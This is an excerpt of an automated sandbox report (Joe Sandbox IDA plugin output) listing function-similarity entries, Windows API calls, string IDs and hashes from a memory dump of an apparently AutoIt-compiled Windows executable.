                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                          • String ID: EA06
                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                          • Opcode ID: 022ee958e49897340cb54c0324da6aa00f08bb9b5c8b8189f497e5453884f740
                                                                                                          • Instruction ID: eb30845b35ae79687ce1c5884cc9e73bb4a17dd27ecab6f67c050f5ec41c4589
                                                                                                          • Opcode Fuzzy Hash: 022ee958e49897340cb54c0324da6aa00f08bb9b5c8b8189f497e5453884f740
                                                                                                          • Instruction Fuzzy Hash: C901F9729442587EDF18C6A8CC56EFE7BF89B05301F00419AF552E6581E579A6088760
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E99923
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 9bb2fc1295062652c9055bbf438fffe008f62dd6e9830cca1ad3c4dc0bc395a0
                                                                                                          • Instruction ID: 9671ed5cbaf07a61901a1a9dd23b11328c90f0148df684ba614e490a82440465
                                                                                                          • Opcode Fuzzy Hash: 9bb2fc1295062652c9055bbf438fffe008f62dd6e9830cca1ad3c4dc0bc395a0
                                                                                                          • Instruction Fuzzy Hash: B801D4B6A421086BCF14EBA4C952EFEB3E89F51340F14211DBC4577282DA105E0CD6B1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E999A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 73d0b2be9bb86750d0d50f0724b20aa2d7eb9ab0cfd0f5ba6fabf20e6a617b97
                                                                                                          • Instruction ID: 48a793fc3c48af63f959b9e06d61ea63dea1b4106622ccdde43ec48b5b1e8867
                                                                                                          • Opcode Fuzzy Hash: 73d0b2be9bb86750d0d50f0724b20aa2d7eb9ab0cfd0f5ba6fabf20e6a617b97
                                                                                                          • Instruction Fuzzy Hash: B201DBB2A421086BCF14EBA4CA12FFFB3EC9F51340F54215ABC45B7282DA154E0CD671
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcscmp
                                                                                                          • String ID: #32770
                                                                                                          • API String ID: 2292705959-463685578
                                                                                                          • Opcode ID: 6af249a6e4bfc8966c22102e0322d68243b3328675de717b9c811ab811fb801f
                                                                                                          • Instruction ID: 28893d899eb8541757d712a41a3222cc8b19acfda260a05068d939951f85f96f
                                                                                                          • Opcode Fuzzy Hash: 6af249a6e4bfc8966c22102e0322d68243b3328675de717b9c811ab811fb801f
                                                                                                          • Instruction Fuzzy Hash: C2E09B7290022D1BD710A699AC45BABFBACEB55771F001057F904E6051D560A94587D0
                                                                                                          APIs
                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E988A0
                                                                                                            • Part of subcall function 00E63588: _doexit.LIBCMT ref: 00E63592
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message_doexit
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                          • Opcode ID: 5b57e8fa333c2f654ced0e106ee3f625fe562ba39d51947f36497b2ddc446287
                                                                                                          • Instruction ID: c1a027044262f4f9dd569cc2dbfd9300a691dd2453b953db6facaceb0140579a
                                                                                                          • Opcode Fuzzy Hash: 5b57e8fa333c2f654ced0e106ee3f625fe562ba39d51947f36497b2ddc446287
                                                                                                          • Instruction Fuzzy Hash: E9D0C27128131832C22432A47D0ABDA6A88CB05B91F04142ABB08755C349E1898042A5
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00E80091
                                                                                                            • Part of subcall function 00EBC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00E8027A,?), ref: 00EBC6E7
                                                                                                            • Part of subcall function 00EBC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EBC6F9
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E80289
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                          • String ID: WIN_XPe
                                                                                                          • API String ID: 582185067-3257408948
                                                                                                          • Opcode ID: 85a2f7a7f95d33d9a34392777f6b5ea14e608332b5128a5d4524bef80b6a4249
                                                                                                          • Instruction ID: 10f1bbd0a1812aae09cb7e4bf4c1ee0671ab99c528ff015a30adc391b5abe334
                                                                                                          • Opcode Fuzzy Hash: 85a2f7a7f95d33d9a34392777f6b5ea14e608332b5128a5d4524bef80b6a4249
                                                                                                          • Instruction Fuzzy Hash: C5F03971806109DFCB55EBA1D988BECBBF8EB08304F242485E14AB21A1CB714F89DF20